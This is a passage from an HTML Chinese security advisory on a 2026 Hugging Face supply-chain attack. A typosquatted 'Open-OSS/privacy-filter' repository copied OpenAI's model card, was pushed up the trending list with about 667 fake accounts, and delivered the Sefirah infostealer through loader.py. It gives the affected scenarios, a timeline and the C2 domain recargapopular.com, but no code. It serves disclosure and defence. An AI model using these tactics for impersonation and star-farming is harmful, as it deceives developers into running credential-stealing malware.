100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041916" src="https://wechat2rss.xlab.app/img-proxy/?k=0079e5a9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSmIfxCjeMQyW0Gym06JuLJtbP2ooXjJVOc0MHmfOVfXuoaEsTFwLsZqQNibMC8Xy9aN5IbuTbiaNgYMHXdf8bq4t6SuGm4cfEQ4%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">受影响场景</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本次事件主要影响在Hugging Face上拉取/下载第三方模型与脚本、并直接在主机本地环境执行的开发者与企业用户，尤其是以下场景：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">直接使用git clone或huggingface-cli下载Open-OSS/privacy-filter并在物理机或开发主机执行loader.py；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在AI Notebook、Jupyter环境中以root或管理员权限交互式运行未审计的第三方模型加载脚本；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在缺少代码签名校验与Sandbox隔离的情况下将Hugging Face模型直接集成进CI/CD流水线；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">同时在同一主机保存浏览器密码、加密货币钱包、SSH私钥与各类Token的AI开发者；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">将下载量、趋势榜排名作为模型可信度评估主要依据的团队。</span></p></li></ul><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">截至披露时，Hugging Face平台本身的基础设施未发现被入侵，OpenAI官方Privacy Filter项目亦未被篡改，本次受害对象集中在主动从仿冒仓库下载并本地执行恶意代码的终端开发者。</span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041905" src="https://wechat2rss.xlab.app/img-proxy/?k=8a886d5b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSbyjZ2icb4bhsHRn3OfSoSzo0WicNfzGib5sD7icXTChUsyfeKibhrO1FGgPngR6D7g5CiasWOiaYEwmOiaCwat5UKCbzzTvTicUHq04Ew%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击时间线</span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid windowtext;mso-border-top-alt:0.5000pt solid windowtext;mso-border-right-alt:0.5000pt solid windowtext;mso-border-bottom-alt:0.5000pt solid windowtext;mso-border-insideh:0.5000pt solid windowtext;mso-border-insidev:0.5000pt solid windowtext;mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;"><tbody><tr style="height:33.1500pt;"><td data-colwidth="131" width="131" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><b><span style=""><font face="仿宋_GB2312"><span leaf="">时间</span></font></span></b></p></td><td data-colwidth="247" width="247" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><b><span style=""><font face="仿宋_GB2312"><span leaf="">事件</span></font></span></b></p></td><td data-colwidth="473" width="473" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><b><span style=""><font face="仿宋_GB2312"><span leaf="">详细说明</span></font></span></b></p></td></tr><tr><td data-colwidth="131" width="131" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="Times New Roman"><span leaf="">2026/2/16</span></font></span></p></td><td data-colwidth="247" width="247" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="Times New Roman" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;text-indent: 0pt;font-family: 仿宋_GB2312;font-size: 12pt;"><span leaf="" style="font-family: 仿宋_GB2312;font-size: 12pt;">C2</span></font><font face="仿宋_GB2312" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-align: center;text-indent: 0pt;font-family: 仿宋_GB2312;font-size: 12pt;"><span leaf="" style="font-family: 仿宋_GB2312;font-size: 12pt;">基础设施预</span></font><font face="仿宋_GB2312"><span leaf="">置</span></font></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;text-align:left;"><span style=""><font face="仿宋_GB2312"><span leaf="">攻击</span></font><font face="仿宋_GB2312" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;"><span leaf="" style="font-family: 仿宋_GB2312;font-size: 12pt;">者注册</span></font><font face="Times New Roman" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;"><span leaf="" style="font-family: 仿宋_GB2312;font-size: 12pt;">C2</span></font><font face="仿宋_GB2312" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;"><span leaf="" style="font-family: 仿宋_GB2312;font-size: 12pt;">域名</span></font><font face="Times New Roman" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;"><span leaf="" style="font-family: 仿宋_GB2312;font-size: 12pt;">recargapopular.com</span></font><font face="仿宋_GB2312" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;"><span leaf="" style="font-family: 仿宋_GB2312;font-size: 12pt;">，使用</span></font><font face="Times New Roman" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;"><span leaf="" style="font-family: 仿宋_GB2312;font-size: 12pt;">TUCOWS.COM</span></font><font face="仿宋_GB2312" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;"><span leaf="" style="font-family: 仿宋_GB2312;font-size: 12pt;">作为注册商，并</span></font><font face="仿宋_GB2312"><span leaf="">配置</span></font><font face="Times New Roman"><span leaf="">Cloudflare</span></font><font face="仿宋_GB2312"><span leaf="">名称服务器（</span></font><font face="Times New Roman"><span leaf="">deborah/west.ns.cloudflare.com</span></font><font face="仿宋_GB2312"><span leaf="">），提前约</span></font><font face="Times New Roman"><span leaf="">3</span></font><font face="仿宋_GB2312"><span leaf="">个月部署用于后续数据外泄的基础设施。</span></font></span></p></td></tr><tr><td data-colwidth="131" width="131" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="Times New Roman"><span leaf="">2026/2 </span></font><font face="仿宋_GB2312"><span leaf="">– </span></font><font face="Times New Roman"><span leaf="">2026/5</span></font></span></p></td><td data-colwidth="247" width="247" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="仿宋_GB2312"><span leaf="">恶意仓库创建与伪装</span></font></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;text-align:left;"><span style=""><font face="仿宋_GB2312"><span leaf="">攻击者在</span></font><font face="Times New Roman"><span leaf="">Hugging Face</span></font><font face="仿宋_GB2312"><span leaf="">注册</span></font><font face="Times New Roman"><span leaf="">Open-OSS/privacy-filter</span></font><font face="仿宋_GB2312"><span leaf="">仓库，逐字复制</span></font><font face="Times New Roman"><span leaf="">OpenAI</span></font><font face="仿宋_GB2312"><span leaf="">官方</span></font><font face="Times New Roman"><span leaf="">Privacy Filter</span></font><font face="仿宋_GB2312"><span leaf="">的</span></font><font face="Times New Roman"><span leaf="">Model Card</span></font><font face="仿宋_GB2312"><span leaf="">，植入伪装为</span></font><font face="Times New Roman"><span leaf="">AI</span></font><font face="仿宋_GB2312"><span leaf="">推理代码的</span></font><font face="Times New Roman"><span leaf="">loader.py</span></font><font face="仿宋_GB2312"><span leaf="">。</span></font></span></p></td></tr><tr><td data-colwidth="131" width="131" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="Times New Roman"><span leaf="">2026/2 </span></font><font face="仿宋_GB2312"><span leaf="">– </span></font><font face="Times New Roman"><span leaf="">2026/5</span></font></span></p></td><td data-colwidth="247" width="247" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="仿宋_GB2312"><span leaf="">虚假账户刷榜推热</span></font></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;text-align:left;"><span style=""><font face="仿宋_GB2312"><span leaf="">通过自动化脚本生成大量虚假账户对仓库执行</span></font><font face="Times New Roman"><span leaf="">star</span></font><font face="仿宋_GB2312"><span leaf="">操作，约</span></font><font face="Times New Roman"><span leaf="">667</span></font><font face="仿宋_GB2312"><span leaf="">个账户参与点赞，将恶意仓库人为推上</span></font><font face="Times New Roman"><span leaf="">Hugging Face</span></font><font face="仿宋_GB2312"><span leaf="">趋势榜榜首位置。</span></font></span></p></td></tr><tr><td data-colwidth="131" width="131" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="仿宋_GB2312"><span leaf="">披露前阶段</span></font></span></p></td><td data-colwidth="247" width="247" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="仿宋_GB2312"><span leaf="">大规模分发</span></font></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;text-align:left;"><span style=""><font face="仿宋_GB2312"><span leaf="">在</span></font><font face="Times New Roman"><span leaf="">Trending</span></font><font face="仿宋_GB2312"><span leaf="">榜单曝光下，仓库累计下载量约</span></font><font face="Times New Roman"><span leaf="">244,000</span></font><font face="仿宋_GB2312"><span leaf="">次，多个真实受害者主机被</span></font><font face="Times New Roman"><span leaf="">Sefirah</span></font><font face="仿宋_GB2312"><span leaf="">窃密木马感染。</span></font></span></p></td></tr><tr><td data-colwidth="131" width="131" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="Times New Roman"><span leaf="">2026/5/7</span></font></span></p></td><td data-colwidth="247" width="247" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="仿宋_GB2312"><span leaf="">初次披露</span></font></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;text-align:left;"><span style=""><font face="Times New Roman"><span leaf="">HiddenLayer</span></font><font face="仿宋_GB2312"><span leaf="">研究人员公开仿冒仓库、</span></font><font face="Times New Roman"><span leaf="">loader.py</span></font><font face="仿宋_GB2312"><span leaf="">、</span></font><font face="Times New Roman"><span leaf="">PowerShell</span></font><font face="仿宋_GB2312"><span leaf="">加载链与最终</span></font><font face="Times New Roman"><span leaf="">Sefirah</span></font><font face="仿宋_GB2312"><span leaf="">载荷的完整分析。</span></font></span></p></td></tr><tr><td data-colwidth="131" width="131" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="Times New Roman"><span leaf="">2026/5/9</span></font></span></p></td><td data-colwidth="247" width="247" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="仿宋_GB2312"><span leaf="">媒体技术报道</span></font></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;text-align:left;"><span style=""><font face="Times New Roman"><span leaf="">BleepingComputer</span></font><font face="仿宋_GB2312"><span leaf="">发布配套技术分析，曝光</span></font><font face="Times New Roman"><span leaf="">C2</span></font><font face="仿宋_GB2312"><span leaf="">域名</span></font><font face="Times New Roman"><span leaf="">recargapopular.com</span></font><font face="仿宋_GB2312"><span leaf="">及与</span></font><font face="Times New Roman"><span leaf="">npm typosquatting</span></font><font face="仿宋_GB2312"><span leaf="">活动的关联。</span></font></span></p></td></tr><tr><td data-colwidth="131" width="131" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="仿宋_GB2312"><span leaf="">披露后</span></font></span></p></td><td data-colwidth="247" width="247" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;"><span style=""><font face="仿宋_GB2312"><span leaf="">下架与扩展溯源</span></font></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="margin-right:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;text-align:left;"><span style=""><font face="Times New Roman"><span leaf="">Hugging Face</span></font><font face="仿宋_GB2312"><span leaf="">下架</span></font><font face="Times New Roman"><span leaf="">Open-OSS/privacy-filter</span></font><font face="仿宋_GB2312"><span leaf="">仓库；研究人员进一步发现，该</span></font><font face="Times New Roman"><span leaf="">loader</span></font><font face="仿宋_GB2312"><span leaf="">基础设施与</span></font><font face="Times New Roman"><span leaf="">npm</span></font><font face="仿宋_GB2312"><span leaf="">生态中分发</span></font><font face="Times New Roman"><span leaf="">WinOS 4.0</span></font><font face="仿宋_GB2312"><span leaf="">植入程序的</span></font><font face="Times New Roman"><span leaf="">typosquatting</span></font><font face="仿宋_GB2312"><span leaf="">活动存在重叠，指向同一跨平台威胁行为体。</span></font></span></p></td></tr></tbody></table></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">技术特征与攻击行为分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041907" src="https://wechat2rss.xlab.app/img-proxy/?k=8bd4b1df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQYpibroj2ASzsv54YEMLZwZ23cbocfibIPibjfROGkCu7D4EuOCFfoTWibbpVR4C7AYicE6eO71vWxibW9ychNwfSKH9rTZdsmxOwu8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">投毒载体与进入方式</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本次事件是典型的“开源AI生态typosquatting + 信任语义滥用”。攻击者综合运用以下三层手段进入受害者主机：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">命</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">名仿</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">冒：</span></span><span leaf="">通过Open-OSS/privacy-filter等高相似度命名仿冒OpenAI官方Privacy Filter项目，欺骗按关键词检索/复制粘贴使用模型的用户；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">内容仿冒：</span></span><span leaf="">几乎逐字复制原始项目的Model Card文档与项目描述，使README与示例代码具备与官方近乎一致的视觉与语义可信度；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">社群信号</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">操纵</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">：</span></span><span leaf="">用自动化生成的约667个虚假账户进行star操作，借助Hugging Face趋势榜的曝光放大作用，使仓库短时间内冲上榜单榜首；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: 